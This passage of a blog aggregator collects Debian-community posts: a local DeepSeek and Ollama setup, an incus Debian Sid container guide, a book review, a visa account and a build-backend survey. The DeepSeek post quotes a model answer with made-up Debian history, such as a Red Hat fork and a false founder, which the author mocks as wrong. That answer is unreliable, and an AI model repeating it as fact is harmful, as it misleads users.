Now that I use a proper certificate, I can use it as a Progressive Web App, and with Firefox on Android this starts the app in full-screen mode (no system bars, no location bar). The F11 key still doesn't work, and using the command palette to enter fullscreen does nothing visible, but then Esc leaves that fullscreen mode and I suddenly have the system bars again. But maybe if I just don't do that I get the full screen experience. We'll see.

I did not work enough with this yet to assess how much the smaller screen estate, the lack of colors and the slower refresh rate will bother me. I probably need to hide Lean's InfoView more often, and maybe use the Error Lens extension, to avoid having to split my screen vertically. I also cannot easily work on a park bench this way, with a tablet and a separate external keyboard. I'd need at least a table, or some additional piece of hardware that turns tablet + keyboard into some laptop-like structure that I can put on my, well, lap.
There are cases for Onyx products that include a keyboard, and maybe they work on the lap, but they don't have the TrackPoint that I have on my ThinkPad TrackPoint Keyboard II, and how can you live without that?

Conclusion

After this initial setup, chances are good that entering and using this environment is convenient enough for me to actually use it; we will see when it gets warmer. A few bits could be better. In particular, logging in and authenticating GitHub access could be both more convenient and safer. I could imagine that when I open the page I confirm it on my phone (maybe with a fingerprint), and that this temporarily grants access to the code-server and to specific GitHub repositories only. Is that easily possible?

31 January 2025

Divine Attah-Ohiemi: Seeking Opportunities: Building a Career in Software Engineering and Beyond

My journey in CS has always been driven by curiosity, determination, and a deep love for understanding software solutions at their tiniest, most complex levels. Taking the ALX Africa Software Engineer track after high school was where it all started for me. During the 1-year intensive bootcamp, I delved into the intricacies of Linux programming and low-level programming with C, which solidified my foundational knowledge. This experience not only enhanced my technical skills but also taught me the importance of adaptability and self-directed learning. I discovered how to approach challenges with curiosity, igniting a passion for exploring software solutions in their most intricate forms. Each module pushed me to think critically and creatively, transforming my understanding of technology and its capabilities. Let's just say that I have always been drawn to asking, "How does this happen?" And I just go on and on until I find an answer eventually, and sometimes I don't, but that's okay. That curiosity, combined with a deep commitment to learning, has guided my journey.

Debian Webmaster

My drive has led me to get involved in open-source contributions, where I can put my knowledge to the test while helping my community. Engaging with real-world experts and learning from my mistakes has been invaluable. One of the highlights of this journey was joining the Debian Webmasters team as an intern through Outreachy. Here, I have the honor of working on redesigning and migrating the old Debian webpages to make them more user-friendly. This experience not only allows me to apply my skills in a practical setting but also deepens my understanding of collaborative software development.

Building My Skills: The Foundation of My Experience

Throughout my academic and professional journey, I have taken on many roles that have shaped my skills and prepared me for what's ahead, I believe. I am definitely not a one-trick pony, and maybe not completely a jack of all trades either, but I am a bit diverse, I'd like to think. Here are the key roles that have defined my journey so far:

Volunteer Developer at Yoris Africa (June 2022 - August 2023)

I began my career by volunteering at Yoris, where I collaborated with a talented team to design and build the frontend for a mobile app. My contributions extended beyond just the frontend; I also worked on backend solutions and microservices, gaining hands-on experience in full-stack development. This role was instrumental in shaping my understanding of software architecture, allowing me to contribute meaningfully to projects while learning from experienced developers in a dynamic environment.

Freelance Academics Software Developer (September 2023 - October 2024)

I freelanced as an academic software developer, where I pitched and developed software solutions for universities in my community. One of my most notable projects was creating a Computer-Based Testing (CBT) software for a medical school, which featured a unique questionnaire and scoring system tailored to their specific needs. This experience not only allowed me to apply my technical skills in a real-world setting but also deepened my understanding of educational software requirements and user experience, ultimately enhancing the learning process for students.

Open Source Intern at Debian Webmaster Team (November 2024 -)

Perhaps the most transformative experience has been my role as an intern at Debian Webmasters. This opportunity allowed me to delve into the fascinating world of open source.
As an intern, I have the chance to work on a project where we are redesigning and migrating the Debian webpages to use a new and faster technology: Go templates with Hugo. For a detailed look at the work and progress I made during my internship, as well as information on this project and how to get involved, you can check out the wiki. My ultimate goal with this role is to build a vibrant community for Debian in Africa and, if given the chance, to host a debian-cd mirror for faster installations in my region. You can connect with me through LinkedIn or X (formerly Twitter), or reach out via email.

29 January 2025

Sergio Talens-Oliag: Testing DeepSeek with Ollama and Open WebUI

With all the recent buzz about DeepSeek and its capabilities, I've decided to give it a try using Ollama and Open WebUI on my work laptop, which has an NVIDIA GPU:
$ lspci | grep NVIDIA
0000:01:00.0 3D controller: NVIDIA Corporation GA107GLM [RTX A2000 8GB Laptop GPU]
             (rev a1)
For the installation I initially looked into the approach suggested in this article, but after reviewing it I decided to go for a Docker-only approach, as it leaves my system clean and updates are easier.

Step 0: Install docker

I already had it on my machine, so nothing to do here.

Step 1: Install the nvidia-container-toolkit package

As it is needed to use the NVIDIA GPU with docker, I followed the instructions to install the package using apt from the NVIDIA website.

Step 2: Run the Open WebUI container bundled with Ollama

I could install ollama directly on Linux or run it on docker, but I found out that there is a container with Open WebUI bundled with Ollama, so I decided to use it instead. To start the container I executed the following command:
docker run -d \
  -e OLLAMA_HOST="0.0.0.0:11434" -p 127.0.0.1:11434:11434 \
  -p 127.0.0.1:3000:8080 \
  -v ollama:/root/.ollama \
  -v open-webui:/app/backend/data \
  --gpus=all --name open-webui --restart always \
  ghcr.io/open-webui/open-webui:ollama
Once the container is up and running, I can access the Open WebUI at http://localhost:3000/ and the Ollama API at http://localhost:11434/ (I added the OLLAMA_HOST environment variable to bind the server to all the container IPs, as it is needed to export it to the host).
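As a quick sanity check that the API is reachable from the host, one can query the standard Ollama endpoint that lists installed models (a minimal sketch, assuming curl is available):

# returns a JSON document describing the locally available models
$ curl http://localhost:11434/api/tags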

Step 3: Install the DeepSeek-R1 model from Open WebUI

After creating an admin user on the Open WebUI, I went to the "select a model" button and asked it to download the deepseek-r1 model (at the time of writing this it matches version deepseek-r1:7b, which uses 4.7GB of space). After the download completed I was able to start chatting with the model on my local machine.
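If you prefer the command line over the web UI, the same download should also be doable with the ollama CLI bundled in the container; a sketch, assuming the binary is on the container's PATH:

# pull the model through the bundled ollama binary instead of the web UI
$ docker exec open-webui ollama pull deepseek-r1:7b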

Step 4: Ask a question

The first question I asked was "Can you tell me what is Debian?" and the answer I got was:
Debian is one of the most popular Linux distributions used worldwide. It is an
open-source operating system that has been around since 1993 and is known for
its stability, security, and reliability. Debian is widely used in servers, data
centers, and enterprise environments because it provides a robust base platform
with excellent documentation, tools, and community support.
### Key Features of Debian:

1. **History**:
   - Debian started as a project called "Pop!!" (Pootle) led by Lars Knutsen, a
     developer from Denmark.
   - It was initially forked from the Linux distribution Red Hat's RH-Debian to
     gain independence and reduce reliance on Red Hat.

2. **Use Cases**:
   - Debian is commonly used as an operating system for servers due to its
     reliability and ease of use in enterprise environments.
   - It is also used for individual user machines (laptops, desktops) because it
     offers a smooth and stable experience.
   - Debian provides the foundation for many popular derivatives like Ubuntu,
     which are designed for consumer use.

3. **Supported Architectures**:
   - Debian supports all major Linux architectures, including 32-bit and 64-bit
     systems, and runs on a wide range of hardware from old servers to modern
     smartphones.

4. **Package Management**:
   - Debian comes with a robust package management system called **Debian Policy
     Language (DPL)**, which allows users to easily install, update, and manage
     software packages.
   - This makes it easy for users to keep their systems up to date without
     needing to download multiple repositories or deal with version conflicts.

5. **Security Focus**:
   - Debian is known for its strong security practices. It has a reputation for
     being one of the most stable Linux distributions, making it a favorite
     among organizations that prioritize security.
   - The distribution regularly updates its software packages to patch
     vulnerabilities and protect against common attacks.

6. **Compatibility with Servers**:
   - Debian is widely used in data centers because it provides a consistent and
     reliable environment for running servers and applications.
   - Many open-source projects are compatible with Debian, making it an ideal
     choice for developers who want to work on servers or distributed systems.

7. **Popularity**:
   - Debian has a large and active community of users and contributors.
   - It is one of the most widely used Linux distributions in the world, with
     many enterprise organizations relying on it as their primary operating
     system.
### Comparison with Other Distributions:
- **Ubuntu**: Ubuntu is based on Debian but adds graphical user interfaces (like
  Gutsy Gibbon), modern tools (like GIMP and LibreOffice), and integrates with
  Microsoft services.
- **RHEL (Red Hat Enterprise Linux)**: RHEL is a derivative of Red Hat's
  distribution, which forked from Debian. It focuses more heavily on enterprise
  security and support compared to Debian.
### Why Debian?
Debian is popular because:
- It is free and open-source, making it accessible to anyone.
- It provides excellent documentation and tools for system administrators.
- It has a strong focus on stability and reliability.
- It supports a wide range of hardware and software needs.
If you're looking for a reliable and flexible Linux distribution that works well
in both personal and enterprise environments, Debian is an excellent choice.
I haven't tried the same question with ChatGPT, but the History, Package Management and Comparison with Other Distributions sections are hilarious, and they provided me with important data:
  • Now I know that APT is the real Debian Project Leader; what I don't know is why we have elections each year ;)
  • Linux distributions are recursive: Debian was a fork of Red Hat, which was a fork of Debian, which was a fork of Red Hat, ...
As everybody is testing the model I will not talk more about the chat and the results; I just thought that this answer was really funny.

Step 5: Install the DeepSeek Coder and DeepSeek Coder v2 models from Open WebUI

As done before, to download the models I went to the "select a model" button and asked it to download the deepseek-coder and deepseek-coder-v2 models (the default version of the former is said to be really quick and small, while the latter is supposed to be better but slower and bigger, so I decided to install both for testing).

Step 6: Integrate Ollama with Neovim

For some months now I've been using GitHub Copilot with Neovim; I don't feel it has been very helpful in the general case, but I wanted to try it, and it comes in handy when you need to perform repetitive tasks while programming. It seems that there are multiple Neovim plugins that support ollama; for now I've installed and configured the codecompanion plugin in my config.lua file using packer:
require('packer').startup(function()
  [...]
  -- Codecompanion plugin
  use {
    "olimorris/codecompanion.nvim",
    requires = {
      "nvim-lua/plenary.nvim",
      "nvim-treesitter/nvim-treesitter",
    },
  }
  [...]
end)
[...]
-- --------------------------------
-- BEG: Codecompanion configuration
-- --------------------------------
-- Module setup
local codecompanion = require('codecompanion').setup({
  adapters = {
    ollama = function()
      return require('codecompanion.adapters').extend('ollama', {
        schema = {
          model = {
            default = 'deepseek-coder-v2:latest',
          },
        },
      })
    end,
  },
  strategies = {
    chat = { adapter = 'ollama' },
    inline = { adapter = 'ollama' },
  },
})
-- --------------------------------
-- END: Codecompanion configuration
-- --------------------------------
I've tested it a little bit and it seems to work fine, but I'll have to test it more to see if it is really useful; I'll try to do that in future projects.

Conclusion

On a personal level I don't like nor trust AI systems, but as long as they are treated as tools and not as some magical thing you must trust, they have their uses, and I'm happy to see open source tools like Ollama and models like DeepSeek available for everyone to use.

27 January 2025

Sergio Talens-Oliag: Running a Debian Sid on Ubuntu

Although I am a Debian Developer (not very active, BTW) I am using Ubuntu LTS (right now version 24.04.1) on my main machine; it is my work laptop and I was told to keep using Ubuntu on it when it was assigned to me, although I don't believe it is really necessary or justified (I don't need support, I don't provide support to others and I usually test my shell scripts on multiple systems if needed anyway). Initially I kept using Debian Sid on my personal laptop, but I gave it to my oldest son, as the one he was using (an old Dell XPS 13) was stolen from him a year ago. I am still using Debian stable on my servers (one at home that also runs LXC containers and another one on an OVH VPS), but I don't have a Debian Sid machine anymore, and while I could reinstall my work machine, I've decided I'm going to try to use a system container to run Debian Sid on it. As I want to use a container instead of a VM I've narrowed my options to lxc or systemd-nspawn (I have docker and podman installed, but I don't believe they are good options for running system containers). As I will want to take snapshots of the container filesystem I've decided to try incus instead of systemd-nspawn (I already have experience with systemd-nspawn, and while it works well it has fewer features than incus).

Installing incus

As this is a personal system where I want to try things, instead of using the packages included with Ubuntu I've decided to install the ones from the zabbly incus stable repository. To do it I've executed the following as root:
# Get the zabbly repository GPG key
curl -fsSL https://pkgs.zabbly.com/key.asc -o /etc/apt/keyrings/zabbly.asc
# Create the zabbly-incus-stable.sources file
sh -c 'cat <<EOF > /etc/apt/sources.list.d/zabbly-incus-stable.sources
Enabled: yes
Types: deb
URIs: https://pkgs.zabbly.com/incus/stable
Suites: $(. /etc/os-release && echo ${VERSION_CODENAME})
Components: main
Architectures: $(dpkg --print-architecture)
Signed-By: /etc/apt/keyrings/zabbly.asc
EOF'
Initially I only plan to use the command line tools, so I've installed the incus and incus-extra packages, but once things work I'll probably install the incus-ui-canonical package too, at least to test it:
apt update
apt install incus incus-extra

Adding my personal user to the incus-admin group

To be able to run incus commands as my personal user I've added it to the incus-admin group:
sudo adduser "$(id -un)" incus-admin
And I've logged out of my desktop session and back in to make the changes effective.

Initializing the incus environment

To configure the incus environment I've executed the incus admin init command and accepted the defaults for all the questions, as they are good enough for my current use case.

Creating a Debian container

To create a Debian container I've used the default debian/trixie image:
incus launch images:debian/trixie debian
This command downloads the image and creates a container named debian using the default profile. The exec subcommand can be used to run a root login shell inside the container:
incus exec debian -- su -l
Instead of exec we can use the shell alias:
incus shell debian
which does the same as the previous command. Inside that shell we can try to update the machine to sid by changing the /etc/apt/sources.list file and using apt:
root@debian:~# echo "deb http://deb.debian.org/debian sid main contrib non-free" \
  >/etc/apt/sources.list
root@debian:~# apt update
root@debian:~# apt dist-upgrade
As my machine has docker installed, the apt update command fails because the network does not work; to fix it I've executed the commands from the following section and re-run apt update and apt dist-upgrade.
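Since snapshots were the reason to pick incus in the first place, this is also a good moment to save the freshly upgraded filesystem; a minimal sketch (the snapshot name is arbitrary, and I'm assuming the current incus snapshot syntax):

# save the container state; restore it later if an experiment goes wrong
incus snapshot create debian sid-fresh
incus snapshot restore debian sid-fresh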

Making the incusbr0 bridge work with Docker

To avoid problems with docker networking we have to add rules for the incusbr0 bridge to the DOCKER-USER chain as follows:
sudo iptables -I DOCKER-USER -i incusbr0 -j ACCEPT
sudo iptables -I DOCKER-USER -o incusbr0 -m conntrack \
  --ctstate RELATED,ESTABLISHED -j ACCEPT
That makes things work now, but to make the rules persistent across reboots we need to add them each time the machine boots. As suggested by the incus documentation I've installed the iptables-persistent package (my command also purges the ufw package, as I was not using it) and saved the current rules during installation:
sudo apt install iptables-persistent --purge
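If the rule set changes later it can be saved again by hand; a quick sketch using the netfilter-persistent wrapper shipped with the iptables-persistent package:
# Re-save the active rules to /etc/iptables/rules.v4 and rules.v6
sudo netfilter-persistent save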

Integrating the DNS resolution of the container with the host
To make DNS resolution for the incus containers work from the host I've followed the incus documentation. To set things up manually I've run the following:
br="incusbr0";
br_ipv4="$(incus network get "$br" ipv4.address)";
br_domain="$(incus network get "$br" dns.domain)";
dns_address="${br_ipv4%/*}";
dns_domain="${br_domain:=incus}";
resolvectl dns "$br" "${dns_address}";
resolvectl domain "$br" "~${dns_domain}";
resolvectl dnssec "$br" off;
resolvectl dnsovertls "$br" off;
And to make the changes persistent across reboots I've created the following service file:
sh -c "cat <<EOF | sudo tee /etc/systemd/system/incus-dns-${br}.service
[Unit]
Description=Incus per-link DNS configuration for ${br}
BindsTo=sys-subsystem-net-devices-${br}.device
After=sys-subsystem-net-devices-${br}.device

[Service]
Type=oneshot
ExecStart=/usr/bin/resolvectl dns ${br} ${dns_address}
ExecStart=/usr/bin/resolvectl domain ${br} ~${dns_domain}
ExecStart=/usr/bin/resolvectl dnssec ${br} off
ExecStart=/usr/bin/resolvectl dnsovertls ${br} off
ExecStopPost=/usr/bin/resolvectl revert ${br}
RemainAfterExit=yes

[Install]
WantedBy=sys-subsystem-net-devices-${br}.device
EOF"
And enabled it:
sudo systemctl daemon-reload
sudo systemctl enable --now incus-dns-${br}.service
If all goes well the DNS resolution works from the host:
$ host debian.incus
debian.incus has address 10.149.225.121
debian.incus has IPv6 address fd42:1178:afd8:cc2c:216:3eff:fe2b:5cea

Using my host user and home dir inside the container
To use my host user and home directory inside the container I need to add the user and group to the container. First I've added my user group with the same GID used on the host:
incus exec debian -- addgroup --gid "$(id --group)" --allow-bad-names \
  "$(id --group --name)"
Once I have the group, I've added the user with the same UID and GID as on the host, without defining a password for it:
incus exec debian -- adduser --uid "$(id --user)" --gid "$(id --group)" \
  --comment "$(getent passwd "$(id --user --name)" | cut -d ':' -f 5)" \
  --no-create-home --disabled-password --allow-bad-names \
  "$(id --user --name)"
Once the user is created we can mount the home directory on the container (we add the shift option to make the container use the same UID and GID as we do on the host):
incus config device add debian home disk source=$HOME path=$HOME shift=true
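To double-check the mount, the device list of the container can be inspected (a quick verification step, not part of the original write-up):
# Show the devices attached to the container, including the new home disk
incus config device show debian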
We already have the shell alias to log in with the root account; now we can add another one to log into the container using the newly created user:
incus alias add ush "exec @ARGS@ -- su -l $(id --user --name)"
To log into the container as our user now we just need to run:
incus ush debian
To be able to use sudo inside the container we could add our user to the sudo group:
incus exec debian -- adduser "$(id --user --name)" "sudo"
But that requires a password and we don't have one, so instead we are going to add a file to the /etc/sudoers.d directory to allow our user to run sudo without a password:
incus exec debian -- \
  sh -c "echo '$(id --user --name) ALL = NOPASSWD: ALL' > /etc/sudoers.d/user"

Accessing the container using ssh
To use the container as a real machine and log into it as I do on remote machines I've installed the openssh-server package and authorized my laptop's public key (as we are mounting the home directory from the host, the key already present in ~/.ssh/authorized_keys lets us log in without a password from the local machine). Also, to be able to run X11 applications from the container I've adjusted the $HOME/.ssh/config file to always forward X11 (option ForwardX11 yes for Host debian.incus) and installed the xauth package in the container. After that I can log into the container running the command ssh debian.incus and start using it after installing other interesting tools like neovim, rsync, tmux, etc.
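For reference, the relevant $HOME/.ssh/config stanza could look like the following sketch, reconstructed from the description above rather than copied from the original configuration:
# Forward X11 whenever we ssh into the container
Host debian.incus
    ForwardX11 yes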

Taking snapshots of the container
As this is a system container we can take snapshots of it using the incus snapshot command; that can be especially useful before doing a dist-upgrade, so we can roll back if something goes wrong. To work with container snapshots we use the incus snapshot command; for example, to create a snapshot we use the create subcommand:
incus snapshot create debian
The snapshot subcommands include options to list the available snapshots, restore one, delete one, etc.
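For example, to list the existing snapshots and roll the container back to the one created above (incus names snapshots snap0, snap1 and so on by default, so the exact name may differ):
# List the snapshots of the debian container
incus snapshot list debian
# Restore the container to the first snapshot
incus snapshot restore debian snap0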

Conclusion
Since last week I have a terminal running a tmux session on the Debian Sid container with multiple zsh windows open (I've changed the prompt so I can easily notice where I am) and it is working as expected. My plan now is to add some packages and use the container for personal projects, so I can work on a Debian Sid system without having to reinstall my work machine. I'll probably write more about it in the future, but for now, I'm happy with the results.

26 January 2025

Russ Allbery: Review: Dark Matters

Review: Dark Matters, by Michelle Diener
Series: Class 5 #4
Publisher: Eclipse
Copyright: October 2019
ISBN: 0-6454658-6-0
Format: Kindle
Pages: 307
Dark Matters is the fourth book in the science fiction semi-romance Class 5 series. There are spoilers for all of the previous books, and although enough is explained that you could make sense of the story starting here, I wouldn't recommend it. As with the other books in the series, it follows new protagonists, but the previous protagonists make an appearance. You will be unsurprised to hear that the Tecran kidnapped yet another Earth woman. The repetitiveness of the setup would be more annoying if the book took itself too seriously, but it doesn't, and so I mostly find it entertaining. I thought Diener was going to dodge the obvious series structure, but now I am wondering if we're going to end up with one woman per Class 5 ship after all. Lucy is not on a ship, however, Tecran or otherwise. She is a captive in a military research facility on the Tecran home world. The Tecran are in very deep trouble given the events of the previous book and have decided that Lucy's existence is a liability. Only the intervention of some sympathetic Tecran scientists she partly befriended during her captivity lets her escape the facility before it's destroyed. Now she's alone, on an alien world, being hunted by the military. It's not entirely the fault of this book that it didn't tell the story that I wanted to read. The setup for Dark Matters implies this book will see the arrival of consequences for the Tecran's blatant violations of the Sentient Beings Agreement. I was looking forward to a more political novel about how such consequences could be administered. This is the sort of problem that we struggle with in our politics: Collective punishment isn't acceptable, but there have to be consequences sufficient to ensure that a state doesn't repeat the outlawed behavior, and yet attempting to deliver those consequences feels like occupation and can set off worse social ruptures and even atrocities. I wasn't expecting that deep of political analysis of what is, after all, a lighthearted SF adventure series, but Diener has been willing to touch on hard problems. The ethics of violence has been an ongoing theme of the series. Alas for me, this is not what we get. The arriving cavalry, in the form of a Class 5 and the inevitable Grih hunk to serve as the love interest du jour, quickly become more interested in helping Lucy elude pursuers (or escape captors) than in the delicate political situation. The conflict between the local population is a significant story element, but only as backdrop. Instead, this reads like a thriller or an action movie, complete with alien predators and a cinematic set piece finale. The political conflict between the Tecran and the United Council does reach a conclusion of sorts, but it's not that satisfying. Perhaps some of the political fallout will happen in future books, but here Diener simplifies the morality of the story in the climax and dodges out of the tricky ethical and social challenge of how to punish a sovereign nation. One of the things I like about this series is that it takes moral indignation seriously, but now that Diener has raised the (correct) complication that people have strong motivations to find excuses for the actions of their own side, I hope she can find a believable political resolution that isn't simple brute force. This entry in the series wasn't bad, but it didn't grab me. 
Lucy was fine as a protagonist; her ability to manipulate the Tecran into making mistakes fits the longer time she's had to study them and keeps her distinct from the other protagonists. But the small bit of politics we do see is unsatisfying and conveniently simplistic, and this book mostly degenerates into generic action sequences. Bane, the Class 5 ship featured in this story, is great when he's active, and I continue to be entertained by the obsession the Class 5 ships have with Earth women, but he's sidelined for too much of the story. I felt like Diener focused on the least interesting part of the story setup. If you've read this far, there's nothing wrong with this entry. You'll probably want to keep reading. But it felt like a missed opportunity. Followed in publication order by Dark Ambitions, a novella that returns to Rose to tell a side story. The next novel is Dark Class, in which we'll presumably see the last kidnapped Earth woman. Rating: 6 out of 10

21 January 2025

Ravi Dwivedi: The Arduous Luxembourg Visa Process

In 2024, I was sponsored by The Document Foundation (TDF) to attend the LibreOffice annual conference in Luxembourg from the 10th to the 12th of October. Being an Indian passport holder, I needed a visa to visit Luxembourg. However, due to my Kenya trip coming up in September, I ran into a dilemma: whether to apply before or after the Kenya trip. To obtain a visa, I needed to submit my application with VFS Global (and not with the Luxembourg embassy directly). Therefore, I checked the VFS website for information on processing time, which says:
As a rule, the processing time of an admissible Schengen visa application should not exceed 15 calendar days (from the date the application is received at the Embassy).
It also mentions:
If the application is received less than 15 calendar days before the intended travel date, the Embassy can deem your application inadmissible. If so, your visa application will not be processed by the Embassy and the application will be sent back to VFS along with the passport.
If I applied for the Luxembourg visa before my trip, I would run the risk of not getting my passport back in time, and therefore missing my Kenya flight. On the other hand, if I waited until after returning from Kenya, I would run afoul of the aforementioned 15 calendar days needed by the embassy to process my application. I had previously applied for a Schengen visa for Austria, which was completed in 7 working days. My friends who had been to France told me they got their visa decision within a week. So, I compared Luxembourg's application numbers with those of other Schengen countries. In 2023, Luxembourg received 3,090 applications from India, while Austria received 39,558, Italy received 52,332 and France received 176,237. Since Luxembourg receives far fewer applications, I expected the process to be quick. Therefore, I submitted my visa application with VFS Global in Delhi on the 5th of August, giving the embassy a month with 18 working days before my Kenya trip. However, I didn't mention my Kenya trip in the Luxembourg visa application. For reference, here is a list of documents I submitted: I submitted flight "reservations" instead of flight "tickets" because, in case of visa rejection, I would have lost a significant amount of money if I had booked confirmed flight tickets. The embassy also recommends the same. After the submission of documents, my fingerprints were taken. The expenses for the visa application were as follows:
Service Description      Amount (INR)
Visa Fee                        8,114
VFS Global Fee                  1,763
Courier                           800
Total                          10,677
Going by the emails sent by VFS, my application reached the Luxembourg embassy the next day. Fast-forward to the 27th of August, the 14th day of my visa application. I had already booked my flight ticket to Nairobi for the 4th of September, but my passport was still with the Luxembourg embassy, and I hadn't heard back. In addition, I had also obtained Kenya's eTA and got vaccinated for Yellow Fever, a requirement to travel to Kenya. In order to check on my application status, I gave the embassy a phone call, but missed their calling window, which was easy to miss since it was only 1 hour (12:00 to 1:00 PM). So, I dropped them an email explaining my situation. At this point, I was already wondering whether to cancel the Kenya trip or the Luxembourg one, if I had to choose. After not getting a response to my email, I called them again the next day. The embassy told me they would look into it and asked me to send my flight tickets over email. One week to go before my flight now. I followed up with the embassy on the 30th by a phone call, and the person who picked up the call told me that my request had already been forwarded to the concerned department and was under process. They asked me to follow up on Monday, 2nd September. During the visa process, I was in touch with three other Indian attendees.1 In the meantime, I got to know that all of them had applied for a Luxembourg visa by the end of the month of August. Back to our story: over the next two days, the embassy was closed for the weekend. I began weighing my options. On one hand, I could cancel the Kenya trip and hope that Luxembourg goes through. Even then, Luxembourg wasn't guaranteed, as the visa could get rejected, so I might have ended up missing both trips. On the other hand, I could cancel the Luxembourg visa application and at least be sure of going to Kenya. However, I thought it would make Luxembourg very unlikely because it didn't leave 15 working days for the embassy to process my visa after returning from Kenya. I also badly wanted to attend the LibreOffice conference because I couldn't make it two years ago. Therefore, I chose not to cancel my Luxembourg visa application. I checked with my travel agent and learned that I could cancel my Nairobi flight before September 4th for a cancellation fee of approximately 7,000 INR. On the 2nd of September, I was a bit frustrated because I hadn't heard anything from the embassy regarding my request. Therefore, I called the embassy again. They assured me that they would arrange a call for me from the concerned department that day, which I did receive later that evening. During the call, they offered to return my passport via VFS the next day and asked me to resubmit it after returning from Kenya. I immediately accepted the offer and was overjoyed, as it would enable me to take my flight to Nairobi without canceling my Luxembourg visa application. However, I didn't have the offer in writing, so it wasn't clear to me how I would collect my passport from VFS. The next day, while I was on my way to VFS, I received an email from the embassy which read:
Dear Mr. Dwivedi, We acknowledge the receipt of your email. As you requested, we are returning your passport exceptionally through VFS, you can collect it directly from VFS Delhi Center between 14:00-17:00 hrs, 03 Sep 2024. Kindly bring the printout of this email along with your VFS deposit receipt and Original ID proof. Once you are back from your trip, you can redeposit the passport with VFS Luxembourg for our processing. With best regards,
Consular Section GRAND DUCHY OF LUXEMBOURG
Embassy in New Delhi
I took a printout of the email and submitted it to VFS to get my passport. This seemed like a miracle: just when I had lost all hope of making it to my Kenya flight and was mentally preparing myself to miss it, I got my passport back exceptionally, and now I had to mentally prepare again for Kenya. I had never before heard of an embassy returning a passport before completing the visa process. The next day, I took my flight to Nairobi as planned. In case you are interested, I have written two blog posts on my Kenya trip: one on the OpenStreetMap conference in Nairobi and the other on my travel experience in Kenya. After returning from Kenya, I resubmitted my passport on the 17th of September. Fast-forward to the 25th of September; I hadn't heard anything from the embassy about my application process. So, I checked with TDF to see whether the embassy had reached out to them. They told me they had confirmed my participation and my hotel booking to the visa authorities on the 19th of September (6 days earlier). I was wondering what was taking so long after the verification. On the 1st of October, I received a phone call from the Luxembourg embassy, which turned out to be a surprise interview. They asked me about my work, my income, how I came to know about the conference, whether I had been to Europe before, etc. The call lasted around 10 minutes. At this point, my travel date (the 8th of October) was just two working days away, as the 2nd of October was off due to Gandhi Jayanti and the 5th and 6th of October were weekends, leaving only the 3rd and the 4th. I am not sure why the embassy saved this for the last moment, even though I had submitted my application 2 months earlier. I also got to know that one of the other Indian attendees missed the call due to being in their college lab, where he was not allowed to take phone calls. Therefore, I recommend that the embassy agree on a time slot for the interview call beforehand. Visa decisions for all the above-mentioned Indian attendees were sent by the embassy on the 4th of October, and I received mine on the 5th. For my travel date of the 8th of October, this was literally the last moment the embassy could send my visa. The parcel contained my passport and a letter. The visa was attached to a page in the passport. I was happy that my visa had been approved, but the timing made my task challenging. The enclosed letter stated:
Subject: Your Visa Application for Luxembourg
Dear Applicant, We would like to inform you that a Schengen visa has been granted for the 8-day duration from 08/10/2024 to 30/10/2024 for conference purposes in Luxembourg. You are requested to report back to the Embassy of Luxembourg in New Delhi through an email (email address redacted) after your return with the following documents:
  • Immigration Stamps (Entry and Exit of Schengen Area)
  • Restaurant Bills
  • Shopping/Hotel/Accommodation bills
Failure to report to the Embassy after your return will be taken into consideration for any further visa applications.
I understand the embassy wanting to ensure my entry into and exit from the Schengen area during the visa validity period, but found the demand for sending shopping bills excessive. Further, not everyone was as lucky as I was: it took a couple of days for one of the Indian attendees to receive their visa, delaying their plans. Another attendee had to send their father to the VFS center to collect their visa in time, rather than wait for the courier to arrive at their home. Foreign travel is complicated, especially for the citizens of countries whose passports and currencies are weak. Embassies issuing visas a day before the travel date doesn't help. For starters, a last-minute visa does not leave enough time to obtain a forex card, as banks ask for the visa. Further, getting foreign currency (Euros in our case) in cash at a good exchange rate becomes difficult. As an example, for the Kenya trip, I had to get US Dollars at the airport due to the plan being finalized at the last moment, worsening the exchange rate. Back to the current case, the flight prices went up significantly compared to September, almost doubling. The choice of airlines also narrowed, as most of the flights were booked by the time I received my visa. With all that said, I think it was still better than an arbitrary rejection. Credits: Contrapunctus, Badri, Fletcher, Benson, and Anirudh for helping with the draft of this post.

  1. Thanks to Sophie, our point of contact for the conference, for putting me in touch with them.

12 January 2025

Bastian Venthur: Investigating the popularity of Python build backends over time (II)

Last year, I analyzed the popularity of build backends used in pyproject.toml files over time. This post is the update for 2024.
Analysis
Like last year, I'm using Tom Forbes' fantastic dataset containing information about every file within every release uploaded to PyPI. To get the current dataset, I followed the same process as in last year's analysis, so I won't repeat all the details here. Instead, I'll highlight the main steps: Downloading all the parquet files took roughly a week due to GitHub's rate limiting. Tom suggested leveraging the Git v2 protocol to fetch the data directly. This approach could bypass rate limiting and complete the download of all pyproject.toml files in just 20 minutes(!). However, I couldn't find sufficient documentation that would help me to implement this method, so this will have to wait until next year's analysis. Once all the data is downloaded, I perform some preprocessing:
Results
I modified the plots a bit from last year to make them easier to read. Most notably, I binned the data into quarters to make the plots less noisy, and secondly, I stopped stacking the relative distribution plots to make the percentages directly readable. The first plot shows the absolute number of uploads (in thousands) by quarter and build backend.
[Plot: Absolute distribution of build backends by quarter]
The second plot shows the relative distribution of build backends by quarter.
[Plot: Relative distribution of build backends by quarter]
In 2024, we observe that: The script for downloading and analyzing the data is available in my GitHub repository. If someone has insights or examples on implementing the Git v2 protocol to download the pyproject.toml file given the repository URL and its hash, I'd love to hear from you!

9 January 2025

Reproducible Builds: Reproducible Builds in December 2024

Welcome to the December 2024 report from the Reproducible Builds project! Our monthly reports outline what we've been up to over the past month and highlight items of news from elsewhere in the world of software supply-chain security when relevant. As ever, however, if you are interested in contributing to the Reproducible Builds project, please visit our Contribute page on our website. Table of contents:
  1. reproduce.debian.net
  2. debian-repro-status
  3. On our mailing list
  4. Enhancing the Security of Software Supply Chains
  5. diffoscope
  6. Supply-chain attack in the Solana ecosystem
  7. Website updates
  8. Debian changes
  9. Other development news
  10. Upstream patches
  11. Reproducibility testing framework

reproduce.debian.net
